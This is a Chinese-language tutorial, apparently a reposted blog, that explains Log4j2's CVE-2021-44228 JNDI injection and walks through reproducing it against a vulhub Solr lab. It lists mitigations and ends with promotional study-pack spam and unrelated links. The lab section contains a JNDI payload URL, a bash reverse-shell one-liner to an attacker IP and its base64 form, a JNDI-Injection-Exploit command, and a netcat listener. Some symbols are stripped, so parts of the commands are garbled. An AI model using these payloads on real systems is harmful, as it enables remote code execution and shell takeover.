当前位置: 首页 > news >正文

零点研究咨询集团官方网站建设淄博网站制作定制升级

零点研究咨询集团官方网站建设,淄博网站制作定制升级,wordpress+分享后下载,网站信息化建设建议书一、简介 Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。 它是 Log4j 的升级版本#xff0c;相比于 Log4j#xff0c;Log4j2 在性能、可靠性和灵活性方面都有显著的改进。 二、特点 Log4j2 是一个功能强大且灵活的日志记录框架#xff0c;旨在提供高…一、简介 Log4j2 是一个用于 Java 应用程序的成熟且功能强大的日志记录框架。 它是 Log4j 的升级版本相比于 Log4jLog4j2 在性能、可靠性和灵活性方面都有显著的改进。 二、特点 Log4j2 是一个功能强大且灵活的日志记录框架旨在提供高性能的日志记录解决方案。它被广泛用于各种 Java 应用程序和框架中帮助开发人员更好地管理和分析应用程序的日志信息。 三、CVE-2021-44228 漏洞简介 log4j支持JNDI协议。 Apache Log4j2是一个基于Java的日志记录工具当前被广泛应用于业务系统开发开发者可以利用该工具将程序的输入输出信息进行日志记录。 漏洞原理 攻击者构造payload在JNDI接口lookup查询进行注入payload为${jndi:ldap:恶意url/poc}JNDI会去对应的服务如LDAP、RMI、DNS、文件系统、目录服务…本例为ldap查找资源由于lookup的出栈没做限制最终指向了攻击者部署好的恶意站点下载了远程的恶意class最终造成了远程代码执行rce。 log4j2框架下的lookup查询服务提供了{}字段解析功能传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制就有可能让查询指向任何服务可能是攻击者部署好的恶意代码。 攻击者可以利用这一点进行JNDI注入使得受害者请求远程服务来链接本地对象在lookup的{}里面构造payload调用JNDI服务LDAP向攻击者提前部署好的恶意站点获取恶意的.class对象造成了远程代码执行可反弹shell到指定服务器。 log4j是一款通用日志记录工具开发人员可以使用log4j对当前程序状态进行记录。log4j的功能非常强大开发人员除了直接记录文本外还可以使用简单表达式记录动态内容例如 logger.info(system propety: ${sys:user.dir}); lookup功能 Lookup 是一种查找机制用于动态获取和替换日志记录中的变量或属性的值。它提供了一种灵活的方式可以在日志消息中引用、解析和插入各种上下文相关的信息。 log4j中除了sys解析器外还有很多其他类型的解析器。其中jndi 解析器就是本次漏洞的源头。 JNDI解析器 JND全称为Java命名和目录接口提供了命名服务和目录服务允许从指定的远程服务器获取并加载对象JNDI注入攻击时常用的就是通过RMI和LDAP两种服务。 正常的包含jndi的日志记录方式如下 logger.info(system propety: ${jndi:schema://url}); log4j2框架下的lookup查询服务提供了{}字段解析功能传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。这样如果不对lookup的出栈进行限制就有可能让查询指向任何服务可能是攻击者部署好的恶意代码。 jdk将从url指定的路径下载一段字节流并将其反序列化为Java对象作为jndi返回。反序列化过程中即会执行字节流中包含的程序。 攻击者如何控制服务器上记录的日志内容呢 大部分web服务程序都会对用户输入进行日志记录。例如用户访问了哪些url有哪些关键的输入等都会被作为参数送到log4j中我们在这些地方写上 ${jndi:ldap://xxx.dnslog.cn}就可以使web服务从xxx.dnslog.cn下载字节流了。 ldap服务 LDAP(轻型目录访问协议)是一个开放的中立的工业标准的应用协议 通过IP协议提供访问 控制和维护分布式信息的目录信息。 目录是一个为查询、浏览和搜索而优化的专业分布式数据库它呈 树状结构组织数据就好象Linux/Unix系统中的文件目录一样。 RMI RMI远程方法调用它是一种机制能够让在某个java虚拟机上的对象调用另一个Java虚拟机 的对象的方法。 三、攻击过程 log4j2 远程代码执行漏洞大致过程此处使用RMILDAP同理 假设有一个Java程序将用户名信息到了日志中如下 a.攻击者发送一个HTTP请求其用户名为${jndi://rmi:服务器地址/Exploit} b.被攻击服务器发现要输出的信息中有 ${}则其中的内容要单独处理进一步解析是JNDI扩展内容且使用的是RMI而后根据RMI服务器地址去请求Exploit。 c.RMI服务器返回Reference对象用于告诉请求端所请求对象所在的类而该Reference指定了远端 文件下载服务器上含有恶意代码的class文件。 d.被攻击服务器通过Reference对象去请求文件下载服务器上的class文件。 e.被攻击服务器下载恶意class文件并执行其中的恶意代码。 LDAP 当用户输入信息时应用程序中的log4j2组件会将信息记录到日志中 a.假如日志中含有该语句${jndi:ldap:192.168.96.1:1099/exp} b.被攻击服务器发现要输出的信息中有 ${}log4j就会去解析该信息通过jndi的lookup()方法去解析该URLldap:192.168.96.1:1099/exp c.解析到ldap就会去192.168.61.129:1099的ldap服务找名为exp的资源如果找不到就会去http服务中找在http中找到exp之后就会将资源信息返回给应用程序的log4j组件而log4j组件就会下载下来然后发现exp是一个.class文件就会去执行里面的代码从而实现注入攻击者就可以通过shell实现任意的命令执行造成严重危害 四、漏洞复现 编号CVE-2021-44228 kali充当靶机IP地址为192.168.200.14 win11充当攻击机IP地址为192.168.200.22 1、漏洞环境 在kali中进入靶场环境 cd /vulhub-master/log4j/CVE-2021-44228 启动环境 docker-compose up -d 2、访问靶机 http://your-ip:8983 3、登录网站dns回显网站 CEYE - Monitor service for security testing 根据身份标识符构造payload查看cecy是否返回数据。 4、dns回显验证 /solr/admin/cores?action${jndi:ldap://xxxxxxxx.io} #ladp是协议后的地址dns地址 查看cecy是否返回数据 5、将bash反弹shell命令编码备用 bash -i /dev/tcp/192.168.200.22/8899 01 注意 bash: 启动一个 Bash shell。-i: 打开一个交互式 shell 会话允许用户输入命令和获取输出。 /dev/tcp/192.168.192.180/5555: 将标准输出和标准错误输出重定向到指定的 IP 地址为 192.168.191.180、端口号为 5555 ’ TCP 连接。换句话说它将尝试建立一个与该 IP 地址和端口号连接的网络套接字并将输出发送到该连接。01: 将标准输入文件描述符 0重定向到标准输出文件描述符 1意味着输入和输出都将通过网络套接字进行传输。 经过base64编码: YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4yMi84ODk5IDAJjE 6、使用JNDIExploit进行漏洞利用 将上面base64编码后的bash命令填入指定位置 格式java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,Base64编码后的Payload} | {base64,-d} | {bash,-i} -A 攻击机IPjava -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIwMC4yMi84ODk5IDAJjE|{bash,-i} -A 192.168.200.22 将下载好的EXP放 置到攻击机中在当前目录下执行编码后的bash命令 将构造的 5.在攻击机中开启监听 nc -lvvp 8899 6.使用payload的进行攻击根据自己攻击机的JDK版本选择 http://192.168.200.14:8983/solr/admin/cores?action${jndi:ldap://192.168.200.22:1389/aybhrq} 回到终端查看回显请求 另一边的监听终端获得root权限 漏洞修复 更新log4j至 rc2配置防火墙策略禁止主动连接外网设备升级受影响的应用及组件过滤相关的关键词比如${jndi://*}限制JNDI默认可以使用的协议限制可以通过LDAP访问的服务器和类 五、网络安全学习路线 为了帮助大家更好的学习网络安全我给大家准备了一份网络安全入门/进阶学习资料里面的内容都是适合零基础小白的笔记和资料不懂编程也能听懂、看懂所有资料共282G朋友们如果有需要全套网络安全入门进阶学习资源包可以点击免费领取如遇扫码问题可以在评论区留言领取哦~ 《网络安全入门进阶学习资源包》CSDN大礼包《黑客网络安全入门进阶学习资源包》免费分享 网安嘿客红蓝对抗所有方向的学习路线 对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。 ​​​​ 学习资料工具包 压箱底的好资料全面地介绍网络安全的基础理论包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等将基础理论和主流工具的应用实践紧密结合有利于读者理解各种主流工具背后的实现机制。 ​​​​ 网络安全源码合集工具包 ​​ 视频教程 ​​ 面试题资料 独家渠道收集京东、360、天融信等公司测试题进大厂指日可待 ​​​ 全部资料共282G朋友们如果有需要全套网络安全入门进阶学习资源包可以点击免费领取如遇扫码问题可以在评论区留言领取哦~ 黑客/网安大礼包CSDN大礼包《黑客网络安全入门进阶学习资源包》免费分享 对于每一个从事网络安全的人来说庞大的网络都如宇宙般浩瀚无垠而作为这个联通世界的巨网的保卫者我们当心存敬畏。
http://www.hkea.cn/news/14498014/

相关文章:

  • 厦门市建设局官方网站证书查询做门户网站需要学什么知识
  • 英文杭州网站建设合肥手机网站制作建设
  • 营销型网站建设专家永久免费微商城小程序
  • 咖啡seo是什么意思苏州关键词优化排名推广
  • 网站建设如何站内搜索wordpress 替换图片
  • 个人网页设计制作网站模板网站建设-丹东
  • 云上城之歌优化seo是什么意思
  • 禁止搜索引擎收录的方法淘宝seo排名优化的方法
  • python小程序代码怎样淘宝做seo网站推广
  • 网站做跳转教程海尔集团网站 建设目的
  • 获奖网站设计网页游戏推广网站怎么做
  • 模板网站官网自己用电脑网站建设
  • 内蒙古建设厅网站首页青州网站建设优化推广
  • 什么网站可以做线上小游戏企业官网制作公司
  • 广东高端网站设计公司制作网站一年多少钱
  • 佛山网站推广怎么做wordpress扁平模板
  • 企业网站建设杭州公司投资公司收到分红要交什么税
  • 网站开发 .net安徽建设干部学校网站
  • 兰州网站建设最新招聘信息开创网站要怎么做
  • 南京微信网站建设哪家好网站链群怎么做
  • 中山网站优化营销烟台高新区规划国土建设局网站
  • 手机网站设计尺寸毫米易语言做网站教程
  • 沧州网站建设公司翼马全国企业信用信息公示系统广东
  • 建设项目信息类网站400网站建设价格
  • 建设一个网站需要什么硬件代挂网站维护
  • 工信部网站备案查询 验证码错误上传网站再备案
  • 丹阳网站建设多少钱网站建设mng
  • 网上做网站的百度ip地址
  • 自助网站建设方法建站公司是外包吗
  • 中山建设厅网站企业wordpress主题下载地址